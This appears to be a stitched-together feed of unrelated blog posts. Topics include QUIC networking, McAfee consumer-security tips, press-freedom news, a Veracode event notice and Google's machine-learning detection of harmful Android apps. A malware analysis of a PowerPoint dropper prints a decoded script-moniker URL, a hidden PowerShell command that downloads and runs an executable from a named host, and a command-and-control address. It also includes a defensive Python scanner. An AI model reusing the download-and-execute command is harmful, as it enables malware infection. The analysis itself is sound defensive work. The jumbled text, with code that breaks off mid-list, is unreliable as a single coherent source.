BTW, "RSS" is a feature of network hardware that splits incoming packets into multiple receive queues. The biggest problem with multi-core scalability is whenever two CPU cores need to read/modify the same thing at the same time, so sharing the same UDP queue of packets becomes the biggest bottleneck. Therefore, first Intel and then other Ethernet vendors added RSS, giving each core its own non-shared packet queue. Linux and then other operating systems upgraded UDP to support multiple file descriptors for a single socket (SO_REUSEPORT) to handle the multiple queues. Now QUIC uses those advances, allowing each core to manage its own stream of UDP packets without the scalability problems of sharing things with other CPU cores. I mention this because I personally had discussions with Intel hardware engineers about having multiple packet queues back in 2000. It's a common problem and an obvious solution, and it's been fun watching it progress over the last two decades until it appears on the top end as HTTP/3. Without RSS in the network hardware, it's unlikely QUIC would become a standard.

Another cool solution in QUIC is mobile support. As you move around with your notebook computer to different WiFi networks, or move around with your mobile phone, your IP address can change. The operating system and protocols don't gracefully close the old connections and open new ones. With QUIC, however, the identifier for a connection is not the traditional concept of a "socket" (the source/destination port/address protocol combination), but a 64-bit identifier assigned to the connection.

This means that as you move around, you can continue with a constant stream uninterrupted from YouTube even as your IP address changes, or continue with a video phone call without it being dropped. Internet engineers have been struggling with "mobile IP" for decades, trying to come up with a workable solution. They've focused on the end-to-end principle of somehow keeping a constant IP address as you moved around, which isn't a practical solution. It's fun to see QUIC/HTTP/3 finally solve this, with a working solution in the real world.

How can you use this new transport? For decades, the standard for network programming has been the transport layer API known as "sockets". That's where you call functions like recv() to receive packets in your code. With QUIC/HTTP/3, we no longer have an operating-system transport-layer API. Instead, it's a higher layer feature that you use in something like the Go programming language, or using Lua in the OpenResty nginx web server.

I mention this because one of the things that's missing from your education about the OSI Model is that it originally envisioned everyone writing to application layer (7) APIs instead of transport layer (4) APIs. There were supposed to be things like application service elements that would handle things like file transfer and messaging in a standard way for different applications. I think people are increasingly moving to that model, especially driven by Google with go, QUIC, protobufs, and so on.

I mention this because of the contrast between Google and Microsoft. Microsoft owns a popular operating system, so its innovations are driven by what it can do within that operating system. Google's innovations are driven by what it can put on top of the operating system. Then there is Facebook and Amazon themselves which must innovate on top of (or outside of) the stack that Google provides them. The top 5 corporations in the world are, in order, Apple-Google-Microsoft-Amazon-Facebook, so where each one drives innovation is important.

Conclusion

When TCP was created in the 1970s, it was sublime. It handled things, like congestion, vastly better than competing protocols. For all that people claim IPv4 didn't anticipate things like having more than 4-billion addresses, it anticipated the modern Internet vastly better than competing designs throughout the 70s and 80s. The upgrade from IPv4 to IPv6 largely maintains what makes IP great. The upgrade from TCP to QUIC is similarly based on what makes TCP great, but extending it to modern needs. It's actually surprising TCP has lasted this long, and this well, without an upgrade.




Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control

You aren’t going to like this post. However, you will, hopefully, find yourself nodding and perhaps, even making some changes because of it. Here it is, friends: That love-hate relationship you have with your smartphone may need some serious attention — not tomorrow or next week — but now.

I’m lecturing myself first by the way. Thanks to the June iOS update that tracks and breaks down phone usage, I’m ready — eager in fact — to make some concrete changes to my digital habits. Why? Because the relationship with my phone – which by the way has become more like a third child — is costing me in time (75 days a year to be exact), stress, and personal goals.

I say this with much conviction because the numbers don’t lie. It’s official: I’m spending more time on my phone than I am with my kids. Likewise, the attention I give and the stress caused by my phone is equivalent to parenting another human. Sad, but true. Here’s the breakdown.

Screen time stats for the past seven days:

  • 5 hours per day on my device
  • 19 hours on social networks
  • 2 hours on productivity
  • 1 hour on creativity
  • 18 phone pickups a day; 2 pickups per hour

Do the math:

  • 35 hours a week on my device
  • 1,820 hours a year on my device
  • 75 days a year on my device

Those numbers are both accurate and disturbing. I’m not proud. Something’s gotta give and, as Michael Jackson once said, change needs to start with the man (woman) in the mirror.

A 2015 study by Pew Research Center found that 24% of Americans can’t stop checking their feeds constantly. No surprise, a handful of other studies confirm excessive phone use is linked to anxiety, depression, and a social phenomenon called FOMO, or Fear Of Missing Out.

Efficiency vs. Anxiety

There’s no argument around the benefits of technology. As parents, we can keep track of our kids’ whereabouts, filter their content, live in smart houses that are efficient and secure, and advance our skills and knowledge at lightning speeds.

That’s a lot of conveniences wrapped in even more pings, alerts, and notifications that can cause anxiety, sleeplessness, and stress.  In our hyper-connected culture, it’s not surprising to see this behavior in yourself or the people in your social circles.

  • Nervousness or anxiety when you are not able to check your notifications.
  • An overwhelming need to share things — photos, personal thoughts, stresses — with others on social media.
  • Withdrawal symptoms when you are not able to access social media.
  • Interrupting conversations to check social media accounts.
  • Lying (downplaying) to others about how much time you spend on social media sites.

We often promote balance in technology use, but this post will go one step further. This post will get uncomfortably specific in suggesting things to do to put a dent in your screentime. (Again, these suggested changes are aimed at this mom first.)

Get Intentional

  • Look at your stats. A lot of people don’t go to the doctor or dentist because they claim “not knowing” about an ailment is less stressful than knowing. Don’t take that approach to your screen time. Make today the day you take a hard look at reality. Both iOS and Android now have screen time tracking.
  • Get reinforcements.  There are a lot of apps out there like Your Hour, AppBlock, Stay Focused, Flipd, and App Off Timer designed to help curb your smartphone usage. Check out the one/s that fits your needs and best helps you control your screen time.
  • Plan your week. If you have activities planned ahead of time for the week — like a hike, reading, a movie, or spending time with friends — you are less likely to fritter away hours on your phone.
  • Leave your phone at home. Just a decade ago we spent full days away from home running errands, visiting friends, and exploring the outdoors — all without our phones. The world kept turning. Nothing fell to pieces. So start small. Go to the grocery store without your phone. Next, have dinner with friends. Then, go on a full day excursion. Wean yourself off your device and reclaim your days and strengthen your relationships.
  • Establish/enforce free family zones. Modeling control in your phone use helps your kids to do the same. Establish phone free zones such as homework time, the dinner table, family activities, and bedtime. The key here is that once you establish the phone free zones, be sure to enforce them. A lot of parents (me included) get lax after a while in this area. Research products that allow you to set rules and time limits for apps and websites. McAfee Safe Family helps you establish limits with pre-defined age-based rules that can be customized based on your family’s needs.
  • Delete unused apps. Give this a try: Delete one social app at a time, for just a day or a week, to see if you need it. If you end up keeping even one time-wasting app off your phone, the change will be well worth it.
  • Engage with people over your phone. If you are in the line at the grocery store, waiting for a show to begin, or hanging out at your child’s school/ sports events, seek to connect with people rather than pull out your phone. Do this intentionally for a week, and it may become a habit!
  • Do one thing at a time. A lot of wasted device time happens because we are multi-tasking — and that time adds up. So if you are watching a movie, reading, or even doing housework put your phone in another room — in a drawer. Try training yourself to focus on doing one thing at a time.
  • Give yourself a phone curfew. We’ve talked about phone curfews for kids to help them get enough sleep but how about one for parents? Pick a time that works for you and stick to it. (I’m choosing to put my phone away at 8 p.m. every night.)
  • Use voice recorder, notes app, or text. Spending too much time uploading random content? Curb your urge to check or post on social media by using your voice recorder app to speak your thoughts into. Likewise, pin that article or post that photo to your notes to catalog it in a meaningful way or text/share it with a small group of people. These few changes could result in big hours saved on social sites.
  • Turn off notifications. You can’t help but look at those notifications so change your habitual response by turning off all notifications.
  • Limit, don’t quit. Moderation is key to making changes stick. Try limiting your social media time to 10 minutes a day. Choose a time that works and set a timer if you need to. There’s no need to sever all ties with social media just keep it in its proper place.

Slow but Specific Changes

Lastly, go at change slowly (but specifically) and give yourself some grace. Change isn’t easy. You didn’t rack up those screen time stats overnight. You’ve come to rely on your phone for a lot of tasks as well as entertainment. So, there’s no need to approach this as a life overhaul, a digital detox, or take an everything or nothing approach. Nor is there a need to trumpet your social departure to your online communities. Just take a look at your reality and do what you need to do to take back your time and control that unruly third child once and for all. You’ve got this!

The post Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control appeared first on McAfee Blogs.

Federal judge reinstates CNN reporter’s press pass after Trump revoked it for critical coverage


In an important victory for press freedom, Federal Judge Timothy Kelly ordered the Trump administration on Friday to temporarily reinstate CNN White House correspondent Jim Acosta’s press credentials.

“We are gratified with this result and we look forward to a full resolution in the coming days,” CNN said in a statement. “Our sincere thanks to all who have supported not just CNN, but a free, strong and independent American press.”

The White House unilaterally revoked Acosta’s press pass last week, following a tense press conference in which Acosta aggressively questioned the president about the special counsel’s Russia investigation.

On November 13, CNN and Acosta filed a lawsuit against Donald Trump as well as other administration officials, alleging that the White House’s suspension of Acosta’s press credentials had violated Acosta’s Fifth Amendment rights.

“Because CNN’s chief White House correspondent has effectively been prohibited from reporting from the White House and the President’s trips, its newsgathering and reporting abilities have been significantly hampered, causing harm not just to CNN, but also to its many viewers and readers who rely on CNN as an essential news source,” reads the complaint by CNN [PDF].

As CNN reported from the court proceedings earlier this week, the Trump administration lawyer  made the rather illuminating argument “that it would be perfectly legal for the White House to revoke a journalist's credentials if it didn't agree with their reporting.”

President Trump has spent his two years in office incessantly threatening his critics and attacking the press. But over and over, Trump has disproportionately targeted and insulted CNN, and specifically Jim Acosta.

When Acosta tried to ask Trump a question days before the president’s inauguration in 2017, he refused. “I’m not going to give you a question,” he said. “You are fake news.”

Jim Acosta’s reporting style is perhaps more direct and belligerent than other reporters with the White House press corps. His willingness to ask Trump tough questions and hold him to answering them is critical in the face of an administration that readily lies and manipulates the truth.

CNN is standing by Acosta, and it’s not the only one. Numerous news organizations — including the Associated Press, Bloomberg, First Look Media, the New York Times, the Washington Post, and Fox News — have filed amicus briefs in support of the lawsuit.

When a reporter asked Trump how long he would leave Acosta “in the penalty box”, the president responded: “As far as I’m concerned, I haven’t made that decision. But it could be others also.”

The White House retaliating against a reporter it doesn't like by denying him access altogether is a threat to all reporting on the president.

“If this kind of retaliation were allowed to go unchallenged, the White House would feel emboldened to use the threat of similar revocations as a means of discouraging critical news coverage,” Katie Fallow and Jameel Jaffer warned in the Columbia Journalism Review. “Other reporters would inevitably hesitate before asking White House officials sharp questions. If the president were allowed to ban reporters whose questions he didn’t like, the result would be press conferences that served only to celebrate, and not challenge, the administration’s agenda.”

In response to CNN’s suit, the government has argued that no one has a constitutional right to a press pass, and the president has the authority to decide which journalists he speaks with and allows into the White House.

“No journalist has a First Amendment right to enter the White House and the President need not survive First Amendment scrutiny whenever he exercises his discretion to deny an individual journalist one of the many hundreds of passes granting on-demand access to the White House complex,” the government’s attorneys wrote in an opposition to CNN’s motion [PDF].

The government’s argument may seem intuitive — as one Twitter user joked, “If having a press pass is a right, I want one!” — but it sidesteps the actual issues in the case.

“The question here is not, does anybody claiming to be a journalist have the right to attend a briefing at the White House or access to the White House facilities?” Jonathan Peters, a professor of journalism and law at the University of Georgia, told Freedom of the Press Foundation. “The question is, what process is due a journalist who has received a press pass from the White House before the White House revokes it? And, can the White House revoke a press pass based on [the journalist’s] content and viewpoint?”

In other words, Acosta may not have a right to a press pass, but he does have the right not to have the government arbitrarily take his press pass away.

Timothy Kelly, the federal judge presiding over CNN’s case against the president, seemed to accept that reasoning when he granted CNN’s motion for a temporary restraining order on Friday.

Following the judge’s order, the White House begrudgingly reinstated Acosta’s press pass, but the lawsuit remains ongoing.

In remarks at the Oval Office, president Trump suggested that he would ultimately prevail in court, once the White House set up a standard process for revoking journalists’ press credentials.

“You have to act with respect when you’re at the White House, and when I see the way some of my people get treated at news conferences, it’s terrible. So we’re setting up a certain standard, which is what the court is requesting,” he said.

“We will end up back in court and we will win,” he added.

What Your Password Says About You

At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices persist despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.

The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives—for banking, social media, and online services, to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.

Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.

So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!

Password Quiz – Answer “Yes” or “No”

  1. Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
  2. You don’t repeat passwords.
  3. Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and characters.
  4. You change default passwords on devices to something hard to guess.
  5. You routinely lock your phone and devices with a passcode or fingerprint.
  6. You don’t share your passwords with people you’re dating or friends.
  7. You use a password manager.
  8. If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
  9. You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
  10. You make sure no one is watching when you type in your passwords.
  11. You try to make your passwords memorable by including phrases that have meaning to you.
  12. You use multi-factor authentication.

Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.

9-12 points:

You’re a Password Pro!

You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.

4-8 points

You’re a Passable Passworder

You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!

1-3 points

You’re a Hacker’s Helper

Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.

Key Tips to Become a Password Pro:

  • Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself. Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
  • Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that comprise a pattern only known to you, such as the first letter in each word of a sentence in your favorite book.
  • Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security software that can detect and stop known threats, help you browse safely, and protect you from identity theft.

For more great password tips, go here.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What Your Password Says About You appeared first on McAfee Blogs.

Veracode at Black Hat Europe 2018

We recently published the 9th volume of our State of Software Security (SoSS) report, and although there are some bright spots, the overall state of software security remains a work in progress. Nowhere is this more true than in Europe. In separate research conducted earlier this year, we found that organizations in Europe are very aware of and concerned about application security. A staggering 94 percent of IDG/Veracode survey respondents agree it’s important to assess the application security capabilities of the vendors and partners from whom they procure software and applications. But at the same time, AppSec programs at most European organizations are not as mature as those in the Americas. In fact, our SoSS data found that European companies lagged behind the average significantly at every milepost of the flaw persistence intervals (how long security-related defects remain in code before being fixed). It took more than double the average time for European organizations to close out three quarters of their open vulnerabilities. Troublingly, 25 percent of vulnerabilities persisted more than two and a half years after discovery.

With shifting development models, and cyberattacks on the rise, addressing this problem and developing an application security program can feel overwhelming for many organizations. But we’ve been doing this for 10+ years, and we know what works, what doesn’t, and what it takes to build a mature, effective program over time. Two important parts of that process are creating security champions, and establishing a game plan for securely using open source. And those are two of the topics we’ll be tackling at Black Hat Europe next month.

Please stop by Booth 402 to meet the team and see the powerful Veracode application security solution in action. In addition, don’t miss the Veracode sessions:

  • The State of Software Security: Looking at Europe: Paul Farrington, Director, Solutions Architecture, Veracode, Wednesday, December 5, 10:15am
  • The Truth About Open Source: How Third-Party Libraries Can Introduce Risks: Chris Wysopal, Chief Technology Officer, Veracode, Wednesday, December 5, 11:25am
  • SDL at Scale: Growing Security Champions: Ryan O’Boyle, Product Security Architect, Veracode, Wednesday, December 5, 10:30am

We look forward to seeing you there! Get details.

Prosecuting WikiLeaks for publishing activities poses a profound threat to press freedom

Uwe Steinert

On Thursday night Justice Department prosecutors inadvertently published court documents that strongly suggest that the Trump administration has secretly filed charges against WikiLeaks publisher Julian Assange. Shortly afterwards, the Washington Post confirmed that charges have indeed been filed against Assange.

While it’s so far unclear what the charges are, news organizations have speculated they may involve the Espionage Act, the 100-year-old law that—on its face—threatens the ability of journalists to do their jobs and could criminalize national security reporting. The Espionage Act has, up until this point, never been used to prosecute a journalist or publisher.

Trevor Timm, executive director of Freedom of the Press Foundation, has issued the following statement:

“Any charges brought against WikiLeaks for their publishing activities pose a profound and incredibly dangerous threat to press freedom. Whether you like Assange or hate him, the theories used in a potential Espionage Act prosecution would threaten countless reporters at the New York Times, Washington Post, and the many other news outlets that report on government secrets all the time. While everyone will have to wait and see what the charges detail, it’s quite possible core First Amendment principles will be at stake in this case.”

We will have much more analysis and comment as this case develops.


Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft Office documents are often used to propagate malware, acting as dynamic droppers. Microsoft Excel with macros and Microsoft Word with user actions (like links or external OLE objects) are the main players in this "Office Dropping Arena". When I figured out that a Microsoft PowerPoint file was used to drop and execute a malicious payload I was amazed; it's not so common (at least in my personal experience), so I decided to write a little bit about it.

The "attack path" is very close to what has been observable in modern threats for years: an email campaign with an attached document and actionable text in it. At first the Microsoft PowerPoint presentation looked like a blank white page, but it was performing a very interesting hidden connection to: hxxps://a.doko.moe/wraeop.sct

Analysing the Microsoft PowerPoint structure, the following slide structure caught my eye:

Stage 1: Microsoft PowerPoint Dropping Website
An external OLE object (compatibility 2006) was present with the following value:
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"  
Decoded from hex to ASCII, that string is much more readable:

scrIPT:hxxps://a.doko.moe/wraeop.sct
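For triage, the same check can be automated. The following is an added example, not code from the original analysis: it walks the relationship parts (*.rels) of an OOXML container, percent-decodes every external Target, and flags script: monikers and needlessly encoded letters. The sample container, its part name, the rId values and the two benign relationships are constructed for the demonstration; only the Target string is the one quoted above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Namespace used by OOXML relationship parts (*.rels).
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MAX_RELS_BYTES = 1 << 20  # skip absurdly large parts (zip-bomb guard)

# Target value quoted in the write-up above, still percent-encoded.
PAGE_TARGET = ("%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko"
               "%2Emo%65%2Fwr%61%65o%70%2E%73%63%74")


def defang(text):
    """Make URLs non-clickable in reports, using the hxxp convention."""
    return re.sub(r"http", "hxxp", text, flags=re.IGNORECASE)


def hides_plain_chars(raw):
    """True if %XX escapes encode letters or digits, which never need escaping."""
    return any(chr(int(h, 16)).isalnum()
               for h in re.findall(r"%([0-9A-Fa-f]{2})", raw))


def scan_ooxml(data):
    """Return one finding (dict) per external relationship in the container."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not an OOXML (zip) container")
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".rels"):
                continue
            if info.file_size > MAX_RELS_BYTES:
                continue
            try:
                # For bulk scanning of hostile files, defusedxml is a
                # hardened drop-in for this parser.
                root = ET.fromstring(zf.read(info))
            except ET.ParseError:
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts cannot reach the network
                raw = rel.get("Target", "")
                decoded = unquote(raw)
                scheme = decoded.split(":", 1)[0].lower() if ":" in decoded else ""
                reasons = []
                if scheme == "script":
                    reasons.append("script-moniker")
                if hides_plain_chars(raw):
                    reasons.append("percent-encoded-letters")
                findings.append({
                    "part": info.filename,
                    "rel_id": rel.get("Id"),
                    "rel_type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "scheme": scheme,
                    "decoded": defang(decoded),
                    "reasons": reasons,
                })
    return findings


def build_sample_pptx():
    """Constructed container holding only the part the scanner reads."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
        f'<Relationship Id="rId1" Type="{REL_TYPE}slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>\n'
        f'<Relationship Id="rId2" Type="{REL_TYPE}hyperlink" '
        'Target="https://example.com/" TargetMode="External"/>\n'
        f'<Relationship Id="rId3" Type="{REL_TYPE}oleObject" '
        f'Target="{PAGE_TARGET}" TargetMode="External"/>\n'
        '</Relationships>\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_ooxml(build_sample_pptx()):
        status = "SUSPICIOUS" if f["reasons"] else "external"
        print(status, f["part"], f["rel_id"], f["rel_type"],
              f["decoded"], f["reasons"])
```

The ordinary hyperlink is listed but not flagged; only the oleObject relationship trips both rules, and its decoded target is reported in defanged form.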

An external object is downloaded and executed as a script on the victim machine. The downloaded file (wraeop.sct) contains JavaScript code representing Stage 2 of the infection process. It is shown below:

Stage 2: Executed Javascript
After decoding the 3.6K script, it is clear that one more stage is involved in the infection process. The following code is the execution path that leads from Stage 2 to Stage 3.
var run = new ActiveXObject('WSCRIPT.Shell').Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe' ); 
The script downloads a file named DAZZI.exe and saves it under a new name, VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe, in the system temporary directory in order to run it. The downloaded PE executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later to VirusTotal.

Stage 3: .NET file 
The third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload, or Stage 4. In other words, Stage 3 reads an image stored as an internal resource of the PE file, then extracts and executes it. The final payload looks like AZORult malware. The evidence comes from traffic analysis, where the identified pattern sends (HTTP POST) data on browser history and specific crafted files under User - AppData to specific PHP pages. Moreover, the command-and-control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZORultV3.


Stage 4: AZORult evidence


I hope you had fun with this, I did! It was super interesting to see the attacker's creativity and the way they act to include malicious content in Office documents. Microsoft should probably take care of this and try to filter or ask permission before including external content, but still this will not be a complete solution (from my personal point of view). A deeper and more invasive action would be needed to check the remote content. Stay tuned!

IoC:
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
wraeop.sct: 4f38fcea4a04074d2729228fb6341d0c03363660f159134db35b4d259b071bb0
download1: hxxps://a.doko.moe/wraeop.sct
download2: hxxp://batteryenhancer.com
DAZZI.exe: c26de4d43100d24017d82bffd1b8c5f1f9888cb749ad59d2cd02ef505ae59f40
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da
C2: hxxps://ominigrind.ml/azzi/index.php

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

Combating Potentially Harmful Applications with Machine Learning at Google: Datasets and Models



[Cross-posted from the Android Developers Blog]

In a previous blog post, we talked about using machine learning to combat Potentially Harmful Applications (PHAs). This blog post covers how Google uses machine learning techniques to detect and classify PHAs. We'll discuss the challenges in the PHA detection space, including the scale of data, the correct identification of PHA behaviors, and the evolution of PHA families. Next, we will introduce two of the datasets that make the training and implementation of machine learning models possible, such as app analysis data and Google Play data. Finally, we will present some of the approaches we use, including logistic regression and deep neural networks.

Using Machine Learning to Scale

Detecting PHAs is challenging and requires a lot of resources. Our security experts need to understand how apps interact with the system and the user, analyze complex signals to find PHA behavior, and evolve their tactics to stay ahead of PHA authors. Every day, Google Play Protect (GPP) analyzes over half a million apps, which makes a lot of new data for our security experts to process.

Leveraging machine learning helps us detect PHAs faster and at a larger scale. We can detect more PHAs just by adding additional computing resources. In many cases, machine learning can find PHA signals in the training data without human intervention. Sometimes, those signals are different than signals found by security experts. Machine learning can take better advantage of this data, and discover hidden relationships between signals more effectively.

There are two major parts of Google Play Protect's machine learning protections: the data and the machine learning models.

Data Sources

The quality and quantity of the data used to create a model are crucial to the success of the system. For the purpose of PHA detection and classification, our system mainly uses two anonymous data sources: data from analyzing apps and data from how users experience apps.

App Data

Google Play Protect analyzes every app that it can find on the internet. We created a dataset by decomposing each app's APK and extracting PHA signals with deep analysis. We execute various processes on each app to find particular features and behaviors that are relevant to the PHA categories in scope (for example, SMS fraud, phishing, privilege escalation). Static analysis examines the different resources inside an APK file while dynamic analysis checks the behavior of the app when it's actually running. These two approaches complement each other. For example, dynamic analysis requires the execution of the app regardless of how obfuscated its code is (obfuscation hinders static analysis), and static analysis can help detect cloaking attempts in the code that may in practice bypass dynamic analysis-based detection. In the end, this analysis produces information about the app's characteristics, which serve as a fundamental data source for machine learning algorithms.

Google Play Data

In addition to analyzing each app, we also try to understand how users perceive that app. User feedback (such as the number of installs, uninstalls, user ratings, and comments) collected from Google Play can help us identify problematic apps. Similarly, information about the developer (such as the certificates they use and their history of published apps) contributes valuable knowledge that can be used to identify PHAs. All these metrics are generated when developers submit a new app (or new version of an app) and by millions of Google Play users every day. This information helps us to understand the quality, behavior, and purpose of an app so that we can identify new PHA behaviors or identify similar apps.

In general, our data sources yield raw signals, which then need to be transformed into machine learning features for use by our algorithms. Some signals, such as the permissions that an app requests, have a clear semantic meaning and can be directly used. In other cases, we need to engineer our data to make new, more powerful features. For example, we can aggregate the ratings of all apps that a particular developer owns, so we can calculate a rating per developer and use it to validate future apps. We also employ several techniques to focus on interesting data. To create compact representations for sparse data, we use embedding. To help streamline the data to make it more useful to models, we use feature selection. Depending on the target, feature selection helps us keep the most relevant signals and remove irrelevant ones.

By combining our different datasets and investing in feature engineering and feature selection, we improve the quality of the data that can be fed to various types of machine learning models.

Models

Building a good machine learning model is like building a skyscraper: quality materials are important, but a great design is also essential. Like the materials in a skyscraper, good datasets and features are important to machine learning, but a great algorithm is essential to identify PHA behaviors effectively and efficiently.

We train models to identify PHAs that belong to a specific category, such as SMS-fraud or phishing. Such categories are quite broad and contain a large number of samples given the number of PHA families that fit the definition. Alternatively, we also have models focusing on a much smaller scale, such as a family, which is composed of a group of apps that are part of the same PHA campaign and that share similar source code and behaviors. On the one hand, having a single model to tackle an entire PHA category may be attractive in terms of simplicity but precision may be an issue as the model will have to generalize the behaviors of a large number of PHAs believed to have something in common. On the other hand, developing multiple PHA models may require additional engineering efforts, but may result in better precision at the cost of reduced scope.

We use a variety of modeling techniques to modify our machine learning approach, including supervised and unsupervised ones.

One supervised technique we use is logistic regression, which has been widely adopted in the industry. These models have a simple structure and can be trained quickly. Logistic regression models can be analyzed to understand the importance of the different PHA and app features they are built with, allowing us to improve our feature engineering process. After a few cycles of training, evaluation, and improvement, we can launch the best models in production and monitor their performance.
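The two kinds of feature described above (permissions used directly, and a per-developer rating aggregated from all of a developer's apps) and the inspection of logistic regression weights, as an added sketch that is not Google's code. The app records, developer names, ratings and labels are constructed, and centring the rating on the scale midpoint is an assumption of this example.

```python
import math
from collections import defaultdict

# Constructed sample data (not real Google Play data): developer, requested
# permissions, mean user rating on a 1-5 scale, analyst label (1 = PHA).
APPS = [
    ("dev_a", {"INTERNET", "CAMERA"}, 4.5, 0),
    ("dev_a", {"INTERNET"}, 4.3, 0),
    ("dev_b", {"INTERNET", "READ_CONTACTS"}, 4.0, 0),
    ("dev_b", {"INTERNET", "CAMERA"}, 3.8, 0),
    ("dev_e", {"INTERNET", "READ_CONTACTS"}, 4.6, 0),
    ("dev_c", {"INTERNET", "SEND_SMS", "READ_CONTACTS"}, 1.8, 1),
    ("dev_c", {"INTERNET", "SEND_SMS"}, 2.2, 1),
    ("dev_d", {"INTERNET", "SEND_SMS", "RECEIVE_SMS"}, 1.5, 1),
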